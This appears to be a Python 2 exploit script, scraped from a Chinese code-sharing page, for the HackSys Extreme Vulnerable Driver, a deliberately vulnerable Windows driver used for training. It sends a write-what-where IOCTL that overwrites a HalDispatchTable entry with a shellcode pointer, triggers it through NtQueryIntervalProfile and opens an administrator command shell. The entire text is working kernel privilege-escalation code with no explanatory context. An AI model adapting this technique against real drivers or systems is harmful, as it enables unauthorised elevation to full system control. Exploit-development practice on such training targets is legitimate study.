def trigger_arbitrary_overwrite():
dwReturn = c_ulong()
driver_handle = kernel32.CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", 0xC0000000,0, None, 0x3, 0, None)
if not driver_handle or driver_handle == -1:
print "[!] Driver handle not found : Error " + str(ctypes.GetLastError())
sys.exit()
# [ -- WHAT (Shellcode pointer) -- ] [ -- WHERE (HDT_kernel_address + 4)-- ]
write_what = heap_alloc_payload()
write_where = get_HDT_kernel_address() + 4
write_what_ptr = c_void_p(write_what)
evil_input = struct.pack("<L", addressof(write_what_ptr)) + struct.pack("<L", write_where)
evil_input_ptr = id(evil_input) + 20
evil_size = len(evil_input)
print "[+] Writing 0x%X at address 0x%X" % (write_what, write_where)
kernel32.DeviceIoControl(driver_handle, 0x22200B, evil_input_ptr, evil_size, None, 0,byref(dwReturn), None)
print "[+] Calling NtQueryIntervalProfile to trigger vuln"
arb = c_ulong(0)
ntdll.NtQueryIntervalProfile(0x1337, byref(arb))
if shell.IsUserAnAdmin():
print "[*] Enjoy Elevated Privs !\r\n"
os.system('cmd.exe')
else:
print "[-] Exploit did not work. Re-run it!"
HEVD_arbitraryoverwrite.py 文件源码
python
阅读 27
收藏 0
点赞 0
评论 0
评论列表
文章目录
